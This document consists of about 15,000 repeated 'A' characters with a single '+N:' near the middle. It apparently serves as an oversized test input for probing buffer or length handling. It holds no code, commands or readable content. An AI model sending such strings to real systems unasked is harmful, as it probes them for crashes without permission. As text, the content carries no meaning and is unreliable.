AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +N:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA